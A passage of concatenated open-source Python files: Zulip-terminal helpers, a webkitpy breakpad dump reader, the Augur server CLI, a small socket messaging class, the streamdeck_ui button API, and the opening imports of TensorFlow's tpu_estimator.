unread_pms=dict(),
unread_huddles=dict(),
streams=defaultdict(int),
)
mentions_count = len(unread_msg_counts['mentions'])
unread_counts['all_mentions'] += mentions_count
for pm in unread_msg_counts['pms']:
count = len(pm['unread_message_ids'])
unread_counts['unread_pms'][pm['sender_id']] = count
unread_counts['all_msg'] += count
unread_counts['all_pms'] += count
for stream in unread_msg_counts['streams']:
count = len(stream['unread_message_ids'])
stream_id = stream['stream_id']
# unsubscribed streams may be in raw unreads, but are not tracked
if not model.is_user_subscribed_to_stream(stream_id):
continue
if model.is_muted_topic(stream_id, stream['topic']):
continue
stream_topic = (stream_id, stream['topic'])
unread_counts['unread_topics'][stream_topic] = count
if not unread_counts['streams'].get(stream_id):
unread_counts['streams'][stream_id] = count
else:
unread_counts['streams'][stream_id] += count
if stream_id not in model.muted_streams:
unread_counts['all_msg'] += count
# store unread count of group pms in `unread_huddles`
for group_pm in unread_msg_counts['huddles']:
count = len(group_pm['unread_message_ids'])
user_ids = group_pm['user_ids_string'].split(',')
user_ids = frozenset(map(int, user_ids))
unread_counts['unread_huddles'][user_ids] = count
unread_counts['all_msg'] += count
unread_counts['all_pms'] += count
return unread_counts
def match_user(user: Any, text: str) -> bool:
"""
Matches if the user full name, last name or email matches
with `text` or not.
"""
full_name = user['full_name'].lower()
keywords = full_name.split()
# adding full_name helps in further narrowing down the right user.
keywords.append(full_name)
keywords.append(user['email'].lower())
for keyword in keywords:
if keyword.startswith(text.lower()):
return True
return False
def match_emoji(emoji: str, text: str) -> bool:
"""
True if the emoji matches with `text` (case insensitive),
False otherwise.
"""
return emoji.lower().startswith(text.lower())
def match_topics(topic_names: List[str], search_text: str) -> List[str]:
return [name for name in topic_names
if name.lower().startswith(search_text.lower())]
DataT = TypeVar('DataT')
def match_stream(data: List[Tuple[DataT, str]], search_text: str,
pinned_streams: List[StreamData]
) -> Tuple[List[DataT], List[str]]:
"""
Returns a list of DataT (streams) and a list of their corresponding names
whose words match with the 'text' in the following order:
* 1st-word startswith match > 2nd-word startswith match > ... (pinned)
* 1st-word startswith match > 2nd-word startswith match > ... (unpinned)
Note: This function expects `data` to be sorted, in a non-decreasing
order, and ordered by their pinning status.
"""
pinned_stream_names = [stream['name'] for stream in pinned_streams]
# Assert that the data is sorted, in a non-decreasing order, and ordered by
# their pinning status.
assert data == sorted(sorted(data, key=lambda data: data[1].lower()),
key=lambda data: data[1] in pinned_stream_names,
reverse=True)
delimiters = '-_/'
trans = str.maketrans(delimiters, len(delimiters) * ' ')
stream_splits = [
((datum, [stream_name] + stream_name.translate(trans).split()[1:]))
for datum, stream_name in data
]
matches = OrderedDict([
('pinned', defaultdict(list)),
('unpinned', defaultdict(list)),
]) # type: OrderedDict[str, DefaultDict[int, List[Tuple[DataT, str]]]]
for datum, splits in stream_splits:
stream_name = splits[0]
kind = 'pinned' if stream_name in pinned_stream_names else 'unpinned'
for match_position, word in enumerate(splits):
if word.lower().startswith(search_text.lower()):
matches[kind][match_position].append((datum, stream_name))
ordered_matches = []
ordered_names = []
for matched_data in matches.values():
if not matched_data:
continue
for match_position in range(max(matched_data.keys()) + 1):
for datum, name in matched_data.get(match_position, []):
if datum not in ordered_matches:
ordered_matches.append(datum)
ordered_names.append(name)
return ordered_matches, ordered_names
def match_group(group_name: str, text: str) -> bool:
"""
True if any group name matches with `text` (case insensitive),
False otherwise.
"""
return group_name.lower().startswith(text.lower())
def format_string(names: List[str], wrapping_text: str) -> List[str]:
"""
Wrap a list of names using the wrapping characters for typeahead
"""
return [wrapping_text.format(name) for name in names]
def powerset(iterable: Iterable[Any],
map_func: Callable[[Any], Any]=set) -> List[Any]:
"""
>> powerset([1,2,3])
returns: [set(), {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}]"
"""
s = list(iterable)
powerset = chain.from_iterable(combinations(s, r)
for r in range(len(s) + 1))
return list(map(map_func, list(powerset)))
def canonicalize_color(color: str) -> str:
"""
Given a color of the format '#xxxxxx' or '#xxx', produces one of the
format '#xxx'. Always produces lowercase hex digits.
"""
if match('^#[0-9A-Fa-f]{6}$', color, ASCII) is not None:
# '#xxxxxx' color, stored by current zulip server
return (color[:2] + color[3] + color[5]).lower()
elif match('^#[0-9A-Fa-f]{3}$', color, ASCII) is not None:
# '#xxx' color, which may be stored by the zulip server <= 2.0.0
# Potentially later versions too
return color.lower()
else:
raise ValueError('Unknown format for color "{}"'.format(color))
def notify(title: str, html_text: str) -> str:
document = lxml.html.document_fromstring(html_text)
text = document.text_content()
command_list = None
if MACOS:
command_list = [
"osascript",
"-e", "on run(argv)",
"-e", "return display notification item 1 of argv with title "
'item 2 of argv sound name "ZT_NOTIFICATION_SOUND"',
"-e", "end",
"--", text, title
]
elif LINUX:
command_list = ["notify-send", "--", title, text]
if command_list is not None:
try:
subprocess.run(command_list, stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
except FileNotFoundError:
# This likely means the notification command could not be found
return command_list[0]
return ""
def display_error_if_present(response: Dict[str, Any], controller: Any
) -> None:
if response['result'] == 'error' and hasattr(controller, 'view'):
controller.view.set_footer_text(response['msg'], 3)
def hash_util_decode(string: str) -> str:
"""
Returns a decoded string given a hash_util_encode() [present in
zulip/zulip's zerver/lib/url_encoding.py] encoded string.
"""
# Acknowledge custom string replacements in zulip/zulip's
# zerver/lib/url_encoding.py before unquote.
return unquote(string.replace('.', '%'))
def get_unused_fence(content: str) -> str:
"""
Generates fence for quoted-message based on regex pattern
of continuous back-ticks. Referred and translated from
zulip/static/shared/js/fenced_code.js.
"""
fence_length_regex = '^ {0,3}(`{3,})'
max_length_fence = 3
matches = findall(fence_length_regex, content,
flags=MULTILINE)
if len(matches) != 0:
max_length_fence = max(max_length_fence,
len(max(matches, key=len)) + 1)
return '`' * max_length_fence
|
dump_reader_multipart.py | # Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import cgi
import logging
import threading
import Queue
from webkitpy.common.webkit_finder import WebKitFinder
from webkitpy.layout_tests.breakpad.dump_reader import DumpReader
_log = logging.getLogger(__name__)
class DumpReaderMultipart(DumpReader):
"""Base class for Linux and Android breakpad dump reader."""
def __init__(self, host, build_dir):
super(DumpReaderMultipart, self).__init__(host, build_dir)
self._webkit_finder = WebKitFinder(host.filesystem)
self._breakpad_tools_available = None
self._generated_symbols = False
def check_is_functional(self):
return self._check_breakpad_tools_available()
def _get_pid_from_dump(self, dump_file):
dump = self._read_dump(dump_file)
if not dump:
return None
if 'pid' in dump:
return dump['pid'][0]
return None
def _get_stack_from_dump(self, dump_file):
dump = self._read_dump(dump_file)
if not dump:
return None
if not 'upload_file_minidump' in dump:
return None
self._generate_breakpad_symbols_if_necessary()
f, temp_name = self._host.filesystem.open_binary_tempfile('dmp')
f.write("\r\n".join(dump['upload_file_minidump']))
f.close()
cmd = [self._path_to_minidump_stackwalk(), temp_name, self._symbols_dir()]
try:
stack = self._host.executive.run_command(cmd, return_stderr=False)
except:
_log.warning('Failed to execute "%s"' % ' '.join(cmd))
stack = None
finally:
self._host.filesystem.remove(temp_name)
return stack
def _read_dump(self, dump_file):
with self._host.filesystem.open_binary_file_for_reading(dump_file) as f:
boundary = f.readline().strip()[2:]
f.seek(0)
try:
data = cgi.parse_multipart(f, {'boundary': boundary})
return data
except:
pass
return None
def _check_breakpad_tools_available(self):
if self._breakpad_tools_available is not None:
return self._breakpad_tools_available
REQUIRED_BREAKPAD_TOOLS = [
'dump_syms',
'minidump_stackwalk',
]
result = True
for binary in REQUIRED_BREAKPAD_TOOLS:
full_path = self._host.filesystem.join(self._build_dir, binary)
if not self._host.filesystem.exists(full_path):
result = False
_log.error('Unable to find %s' % binary)
_log.error(' at %s' % full_path)
if not result:
_log.error(" Could not find breakpad tools, unexpected crashes won't be symbolized")
_log.error(' Did you build the target blink_tests?')
_log.error('')
self._breakpad_tools_available = result
return self._breakpad_tools_available
def _path_to_minidump_stackwalk(self):
return self._host.filesystem.join(self._build_dir, "minidump_stackwalk")
def _path_to_generate_breakpad_symbols(self):
return self._webkit_finder.path_from_chromium_base(
"components", "crash", "content", "tools", "generate_breakpad_symbols.py")
def _symbols_dir(self):
return self._host.filesystem.join(self._build_dir, 'content_shell.syms')
def _generate_breakpad_symbols_if_necessary(self):
if self._generated_symbols:
return
self._generated_symbols = True
_log.debug("Generating breakpad symbols")
queue = Queue.Queue()
thread = threading.Thread(target=_symbolize_keepalive, args=(queue,))
thread.start()
try:
for binary in self._binaries_to_symbolize():
_log.debug(' Symbolizing %s' % binary)
full_path = self._host.filesystem.join(self._build_dir, binary)
cmd = [
self._path_to_generate_breakpad_symbols(),
'--binary=%s' % full_path,
'--symbols-dir=%s' % self._symbols_dir(),
'--build-dir=%s' % self._build_dir,
]
try:
self._host.executive.run_command(cmd)
except:
_log.error('Failed to execute "%s"' % ' '.join(cmd))
finally:
queue.put(None)
thread.join()
_log.debug("Done generating breakpad symbols")
def _binaries_to_symbolize(self):
"""This routine must be implemented by subclasses.
Returns an array of binaries that need to be symbolized."""
raise NotImplementedError()
def _symbolize_keepalive(queue):
while True:
_log.debug("waiting for symbolize to complete")
try:
msg = queue.get(block=True, timeout=60)
return
except Queue.Empty:
pass
class DumpReaderLinux(DumpReaderMultipart):
"""Linux breakpad dump reader."""
def _binaries_to_symbolize(self):
return ['content_shell', 'libtest_netscape_plugin.so', 'libosmesa.so']
def _file_extension(self):
return 'dmp'
class DumpReaderAndroid(DumpReaderMultipart):
"""Android breakpad dump reader."""
def _binaries_to_symbolize(self):
return ['lib/libcontent_shell_content_view.so']
def _file_extension(self):
return 'dmp'
|
backend.py | #SPDX-License-Identifier: MIT
"""
Augur library commands for controlling the backend components
"""
from copy import deepcopy
import os, time, atexit, subprocess, click, atexit, logging, sys
import psutil
import signal
import multiprocessing as mp
import gunicorn.app.base
from gunicorn.arbiter import Arbiter
from augur.cli import initialize_logging, pass_config, pass_application
from augur.housekeeper import Housekeeper
from augur.server import Server
from augur.application import Application
from augur.gunicorn import AugurGunicornApp
logger = logging.getLogger("augur")
@click.group('server', short_help='Commands for controlling the backend API server & data collection workers')
def cli():
pass
@cli.command("start")
@click.option("--disable-housekeeper", is_flag=True, default=False, help="Turns off the housekeeper")
@click.option("--skip-cleanup", is_flag=True, default=False, help="Disables the old process cleanup that runs before Augur starts")
@click.option("--logstash", is_flag=True, default=False, help="Runs logstash to collect errors from logs")
@click.option("--logstash-with-cleanup", is_flag=True, default=False, help="Runs logstash to collect errors from logs and cleans all previously collected errors")
def start(disable_housekeeper, skip_cleanup, logstash, logstash_with_cleanup):
"""
Start Augur's backend server
"""
augur_app = Application()
logger.info("Augur application initialized")
logger.info(f"Using config file: {augur_app.config.config_file_location}")
if not skip_cleanup:
logger.debug("Cleaning up old Augur processes...")
_broadcast_signal_to_processes()
time.sleep(2)
else:
logger.debug("Skipping process cleanup")
if logstash or logstash_with_cleanup:
augur_home = os.getenv('ROOT_AUGUR_DIRECTORY', "")
if logstash_with_cleanup:
print("Cleaning old workers errors...")
with open(augur_home + "/log_analysis/http/empty_index.html") as f:
lines = f.readlines()
with open(augur_home + "/log_analysis/http/index.html", "w") as f1:
f1.writelines(lines)
print("All previous workers errors got deleted.")
elasticsearch_path = os.getenv('ELASTIC_SEARCH_PATH', "/usr/local/bin/elasticsearch")
subprocess.Popen(elasticsearch_path)
logstash_path = os.getenv('LOGSTASH_PATH', "/usr/local/bin/logstash")
subprocess.Popen([logstash_path, "-f", augur_home + "/log_analysis/logstash-filter.conf"])
master = initialize_components(augur_app, disable_housekeeper)
logger.info('Starting Gunicorn webserver...')
logger.info(f"Augur is running at: http://0.0.0.0:5000")
logger.info("Gunicorn server logs & errors will be written to logs/gunicorn.log")
logger.info('Housekeeper update process logs will now take over.')
Arbiter(master).run()
@cli.command('stop')
@initialize_logging
def stop():
"""
Sends SIGTERM to all Augur server & worker processes
"""
_broadcast_signal_to_processes(given_logger=logging.getLogger("augur.cli"))
@cli.command('kill')
@initialize_logging
def kill():
"""
Sends SIGKILL to all Augur server & worker processes
"""
_broadcast_signal_to_processes(signal=signal.SIGKILL, given_logger=logging.getLogger("augur.cli"))
@cli.command('processes')
@initialize_logging
def processes():
"""
Outputs the name/PID of all Augur server & worker processes"""
logger = logging.getLogger("augur.cli")
processes = get_augur_processes()
for process in processes:
logger.info(f"Found process {process.pid}")
def get_augur_processes():
processes = []
for process in psutil.process_iter(['cmdline', 'name', 'environ']):
if process.info['cmdline'] is not None and process.info['environ'] is not None:
try:
if os.getenv('VIRTUAL_ENV') in process.info['environ']['VIRTUAL_ENV'] and 'python' in ''.join(process.info['cmdline'][:]).lower():
if process.pid != os.getpid():
processes.append(process)
except KeyError:
pass
return processes
def _broadcast_signal_to_processes(signal=signal.SIGTERM, given_logger=None):
if given_logger is None:
_logger = logger
else:
_logger = given_logger
processes = get_augur_processes()
if processes != []:
for process in processes:
if process.pid != os.getpid():
logger.info(f"Stopping process {process.pid}")
try:
process.send_signal(signal)
except psutil.NoSuchProcess as e:
pass
def initialize_components(augur_app, disable_housekeeper):
master = None
manager = None
broker = None
housekeeper = None
worker_processes = []
mp.set_start_method('forkserver', force=True)
if not disable_housekeeper:
manager = mp.Manager()
broker = manager.dict()
housekeeper = Housekeeper(broker=broker, augur_app=augur_app)
controller = augur_app.config.get_section('Workers')
for worker in controller.keys():
if controller[worker]['switch']:
for i in range(controller[worker]['workers']):
logger.info("Booting {} #{}".format(worker, i + 1))
worker_process = mp.Process(target=worker_start, name=f"{worker}_{i}", kwargs={'worker_name': worker, 'instance_number': i, 'worker_port': controller[worker]['port']}, daemon=True)
worker_processes.append(worker_process)
worker_process.start()
augur_app.manager = manager
augur_app.broker = broker
augur_app.housekeeper = housekeeper
atexit._clear()
atexit.register(exit, augur_app, worker_processes, master)
return AugurGunicornApp(augur_app.gunicorn_options, augur_app=augur_app)
def worker_start(worker_name=None, instance_number=0, worker_port=None):
try:
time.sleep(30 * instance_number)
destination = subprocess.DEVNULL
process = subprocess.Popen("cd workers/{} && {}_start".format(worker_name,worker_name), shell=True, stdout=destination, stderr=subprocess.STDOUT)
logger.info("{} #{} booted.".format(worker_name,instance_number+1))
except KeyboardInterrupt as e:
pass
def exit(augur_app, worker_processes, master):
logger.info("Shutdown started for this Gunicorn worker...")
augur_app.shutdown()
if worker_processes:
for process in worker_processes:
logger.debug("Shutting down worker process with pid: {}...".format(process.pid))
process.terminate()
if master is not None:
logger.debug("Shutting down Gunicorn server")
master.halt()
logger.info("Shutdown complete")
sys.exit(0)
|
Communicate.py | import socket
from collections import deque
from threading import Thread, Event
# TODO - fix how the connection closes.
class Communicate(object):
def __init__(self):
self.address = ""
self.port = 5580
self.finished = False
self.inbox = deque()
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.getMessagesThread = Thread(target=self.getMessages)
self.getMessagesThread.daemon = True
self.e = Event()
print(self.address)
return
def setupLine(self, addr):
self.address = addr
if self.address is "": #i.e. server on raspberry pi
try:
self.connection.bind((self.address, self.port))
self.connection.listen(1)
self.connection, otherAddress = self.connection.accept()
print("connected to: " + otherAddress[0])
except socket.error as msg:
print(msg)
else:
self.connection.connect((self.address, self.port)) # i.e. client
self.getMessagesThread.start()
return
def sendMessage(self, msg):
self.connection.send(str.encode(msg))
return
def getMessages(self):
while not self.finished:
received = self.connection.recv(1024)
decoded = received.decode('utf-8')
if len(decoded) > 0:
if decoded == "connection closed.":
print("connection closed.")
if decoded == "client disconnected.":
self.finished = True
else:
self.inbox.appendleft(decoded)
return
def closeConnection(self):
self.finished = True
self.e.set()
self.getMessagesThread.join()
self.connection.close()
return
# EXAMPLE CASES
##if(__name__ == "__main__"):
## robotClient = Communicate()
## robotClient.setupLine("127.0.0.1")
## while(True):
## val = input("enter something: ")
## robotClient.sendMessage(val)
##if(__name__ == "__main__"):
## try:
## robotServer = Communicate()
## print("waiting for client to connect...")
## robotServer.setupLine("")
## print("connected!")
## while(True):
## if(len(robotServer.inbox) > 0):
## print(robotServer.inbox.pop())
## if(robotServer.finished):
## break
## #robotServer.closeConnection()
## except:
## pass
## finally:
## robotServer.closeConnection()
|
api.py | """Defines the Python API for interacting with the StreamDeck Configuration UI"""
import json
import os
import threading
from functools import partial
from subprocess import Popen # nosec - Need to allow users to specify arbitrary commands
from typing import Dict, List, Tuple, Union
from warnings import warn
from PIL import Image, ImageDraw, ImageFont
from pynput.keyboard import Controller, Key
from StreamDeck import DeviceManager, ImageHelpers
from StreamDeck.Devices import StreamDeck
from StreamDeck.ImageHelpers import PILHelper
from streamdeck_ui.config import CONFIG_FILE_VERSION, DEFAULT_FONT, FONTS_PATH, STATE_FILE
image_cache: Dict[str, memoryview] = {}
decks: Dict[str, StreamDeck.StreamDeck] = {}
state: Dict[str, Dict[str, Union[int, Dict[int, Dict[int, Dict[str, str]]]]]] = {}
live_functions: List = []
def _key_change_callback(deck_id: str, _deck: StreamDeck.StreamDeck, key: int, state: bool) -> None:
if state:
keyboard = Controller()
page = get_page(deck_id)
command = get_button_command(deck_id, page, key)
if command:
Popen(command.split(" "))
keys = get_button_keys(deck_id, page, key)
if keys:
keys = keys.strip().replace(" ", "")
for section in keys.split(","):
for key_name in section.split("+"):
keyboard.press(getattr(Key, key_name.lower(), key_name))
for key_name in section.split("+"):
keyboard.release(getattr(Key, key_name.lower(), key_name))
write = get_button_write(deck_id, page, key)
if write:
keyboard.type(write)
brightness_change = get_button_change_brightness(deck_id, page, key)
if brightness_change:
change_brightness(deck_id, brightness_change)
switch_page = get_button_switch_page(deck_id, page, key)
if switch_page:
set_page(deck_id, switch_page - 1)
def _save_state():
export_config(STATE_FILE)
def _open_config(config_file: str):
global state
with open(config_file) as state_file:
config = json.loads(state_file.read())
file_version = config.get("streamdeck_ui_version", 0)
if file_version != CONFIG_FILE_VERSION:
raise ValueError(
"Incompatible version of config file found: "
f"{file_version} does not match required version "
f"{CONFIG_FILE_VERSION}."
)
state = {}
for deck_id, deck in config["state"].items():
deck["buttons"] = {
int(page_id): {int(button_id): button for button_id, button in buttons.items()}
for page_id, buttons in deck.get("buttons", {}).items()
}
state[deck_id] = deck
def import_config(config_file: str) -> None:
_open_config(config_file)
render()
_save_state()
def export_config(output_file: str) -> None:
with open(output_file, "w") as state_file:
state_file.write(
json.dumps(
{"streamdeck_ui_version": CONFIG_FILE_VERSION, "state": state},
indent=4,
separators=(",", ": "),
)
)
def open_decks() -> Dict[str, Dict[str, Union[str, Tuple[int, int]]]]:
"""Opens and then returns all known stream deck devices"""
for deck in DeviceManager.DeviceManager().enumerate():
deck.open()
deck.reset()
deck_id = deck.get_serial_number()
decks[deck_id] = deck
deck.set_key_callback(partial(_key_change_callback, deck_id))
return {
deck_id: {"type": deck.deck_type(), "layout": deck.key_layout()}
for deck_id, deck in decks.items()
}
def ensure_decks_connected() -> None:
"""Reconnects to any decks that lost connection. If they did, re-renders them."""
for deck_serial, deck in decks.copy().items():
if not deck.connected():
for new_deck in DeviceManager.DeviceManager().enumerate():
try:
new_deck.open()
new_deck_serial = new_deck.get_serial_number()
except Exception as error:
warn(f"A {error} error occurred when trying to reconnect to {deck_serial}")
new_deck_serial = None
if new_deck_serial == deck_serial:
deck.close()
new_deck.reset()
new_deck.set_key_callback(partial(_key_change_callback, new_deck_serial))
decks[new_deck_serial] = new_deck
render()
def get_deck(deck_id: str) -> Dict[str, Dict[str, Union[str, Tuple[int, int]]]]:
return {"type": decks[deck_id].deck_type(), "layout": decks[deck_id].key_layout()}
def _button_state(deck_id: str, page: int, button: int) -> dict:
buttons = state.setdefault(deck_id, {}).setdefault("buttons", {})
buttons_state = buttons.setdefault(page, {}) # type: ignore
return buttons_state.setdefault(button, {}) # type: ignore
class LiveFunction:
def __init__(self, deck_id: str, page: int, button: int, function_to_run, args):
self.deck_id = deck_id
self.page = page
self.button = button
self.function = function_to_run
self.function_args = args
def __eq__(self, other):
if self.deck_id != other.deck_id:
return False
if self.page != other.page:
return False
if self.button != other.button:
return False
if self.function != other.function:
return False
if self.function_args != other.function_args:
return False
return True
def __hash__(self):
return hash(f"{self.deck_id}{self.page}{self.button}")
def remove_all_from_btn(self):
lf_to_remove = []
for live_function in live_functions:
if self.deck_id == live_function.deck_id and self.page == live_function.page and self.button == live_function.button:
lf_to_remove.append(live_function)
for lf in lf_to_remove:
live_functions.remove(lf)
def btn_has_diff_function_running(self):
return any(self.deck_id == f.deck_id and self.page == f.page and self.button == f.button and (self.function != f.function or self.function_args != f.function_args) for f in live_functions)
def _set_button_live_info(deck_id: str, page: int, button: int, start: bool, func, *args):
import threading
live_function = LiveFunction(deck_id, page, button, func, *args)
if not start:
live_function.remove_all_from_btn()
# Clear Text
set_button_info(deck_id, page, button, "")
return
if live_function.btn_has_diff_function_running():
live_function.remove_all_from_btn()
# Already registered, skip and carry on
if live_function in live_functions:
return
live_functions.append(live_function)
# Ensure we don't kick off multiple threads at once
thread_name = "live_updater"
if any(thread.name == thread_name for thread in threading.enumerate()):
return
thread = threading.Thread(name=thread_name, target=_start_live_updater)
thread.daemon = True
thread.start()
def set_button_live_time(deck_id: str, page: int, button: int, start: bool) -> None:
"""Set the button to display live time every second"""
_set_button_live_info(deck_id, page, button, start, _get_current_time, ["%H:%M:%S"])
def _get_current_time(date_format: str):
from datetime import datetime
return datetime.now().strftime(date_format)
def set_button_live_hour(deck_id: str, page: int, button: int, start: bool) -> None:
"""Set the button to display the current hour"""
# Set Font
_button_state(deck_id, page, button)["font_size"] = 48
_set_button_live_info(deck_id, page, button, start, _get_current_time, ["%H"])
def set_button_live_minute(deck_id: str, page: int, button: int, start: bool) -> None:
"""Set the button to display the current minute"""
_button_state(deck_id, page, button)["font_size"] = 48
_set_button_live_info(deck_id, page, button, start, _get_current_time, ["%M"])
def _start_live_updater():
import time
while len(live_functions) > 0:
for live_function in live_functions:
result = live_function.function(*live_function.function_args)
set_button_info(live_function.deck_id, live_function.page, live_function.button, result)
time.sleep(1)
def set_button_text(deck_id: str, page: int, button: int, text: str) -> None:
"""Set the text associated with a button"""
_button_state(deck_id, page, button)["text"] = text
image_cache.pop(f"{deck_id}.{page}.{button}", None)
render()
_save_state()
def get_button_text(deck_id: str, page: int, button: int) -> str:
"""Returns the text set for the specified button"""
return _button_state(deck_id, page, button).get("text", "")
def set_button_icon(deck_id: str, page: int, button: int, icon: str) -> None:
"""Sets the icon associated with a button"""
_button_state(deck_id, page, button)["icon"] = icon
image_cache.pop(f"{deck_id}.{page}.{button}", None)
render()
_save_state()
def get_button_icon(deck_id: str, page: int, button: int) -> str:
"""Returns the icon set for a particular button"""
return _button_state(deck_id, page, button).get("icon", "")
def set_button_info(deck_id: str, page: int, button: int, info: str) -> None:
"""Set the information associated with a button"""
_button_state(deck_id, page, button)["information"] = info
image_cache.pop(f"{deck_id}.{page}.{button}", None)
render()
_save_state()
def get_button_info(deck_id: str, page: int, button: int) -> str:
"""Returns the information set for the specified button"""
return _button_state(deck_id, page, button).get("information", "")
def set_button_change_brightness(deck_id: str, page: int, button: int, amount: int) -> None:
"""Sets the brightness changing associated with a button"""
_button_state(deck_id, page, button)["brightness_change"] = amount
render()
_save_state()
def get_button_change_brightness(deck_id: str, page: int, button: int) -> int:
"""Returns the brightness change set for a particular button"""
return _button_state(deck_id, page, button).get("brightness_change", 0)
def set_button_command(deck_id: str, page: int, button: int, command: str) -> None:
"""Sets the command associated with the button"""
_button_state(deck_id, page, button)["command"] = command
_save_state()
def get_button_command(deck_id: str, page: int, button: int) -> str:
"""Returns the command set for the specified button"""
return _button_state(deck_id, page, button).get("command", "")
def set_button_switch_page(deck_id: str, page: int, button: int, switch_page: int) -> None:
"""Sets the page switch associated with the button"""
_button_state(deck_id, page, button)["switch_page"] = switch_page
_save_state()
def get_button_switch_page(deck_id: str, page: int, button: int) -> int:
"""Returns the page switch set for the specified button. 0 implies no page switch."""
return _button_state(deck_id, page, button).get("switch_page", 0)
def set_button_information_index(deck_id: str, page: int, button: int, info_index: int) -> None:
"""Sets the Information index for the given button"""
_button_state(deck_id, page, button)["information_index"] = info_index
_save_state()
def get_button_information_index(deck_id: str, page: int, button: int) -> int:
"""Returns the index of the 'Information' dropdown for the specified button."""
return _button_state(deck_id, page, button).get("information_index", 0)
def set_button_keys(deck_id: str, page: int, button: int, keys: str) -> None:
"""Sets the keys associated with the button"""
_button_state(deck_id, page, button)["keys"] = keys
_save_state()
def get_button_keys(deck_id: str, page: int, button: int) -> str:
"""Returns the keys set for the specified button"""
return _button_state(deck_id, page, button).get("keys", "")
def set_button_write(deck_id: str, page: int, button: int, write: str) -> None:
"""Sets the text meant to be written when button is pressed"""
_button_state(deck_id, page, button)["write"] = write
_save_state()
def get_button_write(deck_id: str, page: int, button: int) -> str:
"""Returns the text to be produced when the specified button is pressed"""
return _button_state(deck_id, page, button).get("write", "")
def set_brightness(deck_id: str, brightness: int) -> None:
"""Sets the brightness for every button on the deck"""
decks[deck_id].set_brightness(brightness)
state.setdefault(deck_id, {})["brightness"] = brightness
_save_state()
def get_brightness(deck_id: str) -> int:
"""Gets the brightness that is set for the specified stream deck"""
return state.get(deck_id, {}).get("brightness", 100) # type: ignore
def change_brightness(deck_id: str, amount: int = 1) -> None:
"""Change the brightness of the deck by the specified amount"""
set_brightness(deck_id, max(min(get_brightness(deck_id) + amount, 100), 0))
def get_page(deck_id: str) -> int:
"""Gets the current page shown on the stream deck"""
return state.get(deck_id, {}).get("page", 0) # type: ignore
def set_page(deck_id: str, page: int) -> None:
"""Sets the current page shown on the stream deck"""
state.setdefault(deck_id, {})["page"] = page
render()
_save_state()
def render() -> None:
"""renders all decks"""
for deck_id, deck_state in state.items():
deck = decks.get(deck_id, None)
if not deck:
warn(f"{deck_id} has settings specified but is not seen. Likely unplugged!")
continue
page = get_page(deck_id)
for button_id, button_settings in (
deck_state.get("buttons", {}).get(page, {}).items() # type: ignore
):
key = f"{deck_id}.{page}.{button_id}"
if key in image_cache:
image = image_cache[key]
else:
image = _render_key_image(deck, **button_settings)
image_cache[key] = image
try:
deck.set_key_image(button_id, image)
except IndexError:
pass
def _render_key_image(deck, icon: str = "", text: str = "", information: str = "", font: str = DEFAULT_FONT, **kwargs):
"""Renders an individual key image"""
text = str(text)
image = ImageHelpers.PILHelper.create_image(deck)
draw = ImageDraw.Draw(image)
font_size = kwargs.get("font_size") if kwargs.get("font_size") else 14
# Give information priority over text
if information:
text = str(information)
if icon:
rgba_icon = Image.open(icon).convert("RGBA")
else:
rgba_icon = Image.new("RGBA", (300, 300))
icon_width, icon_height = image.width, image.height
if text:
icon_height -= 20
rgba_icon.thumbnail((icon_width, icon_height), Image.LANCZOS)
icon_pos = ((image.width - rgba_icon.width) // 2, 0)
image.paste(rgba_icon, icon_pos, rgba_icon)
if text:
true_font = ImageFont.truetype(os.path.join(FONTS_PATH, font), font_size)
label_w, label_h = draw.textsize(text, font=true_font)
if icon:
label_pos = ((image.width - label_w) // 2, image.height - 20)
else:
label_pos = ((image.width - label_w) // 2, ((image.height - label_h) // 2))
draw.text(label_pos, text=text, font=true_font, fill="white")
return ImageHelpers.PILHelper.to_native_format(deck, image)
if os.path.isfile(STATE_FILE):
_open_config(STATE_FILE)
|
tpu_estimator.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import enum
import math
import os
import signal
import sys
import threading
import time
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
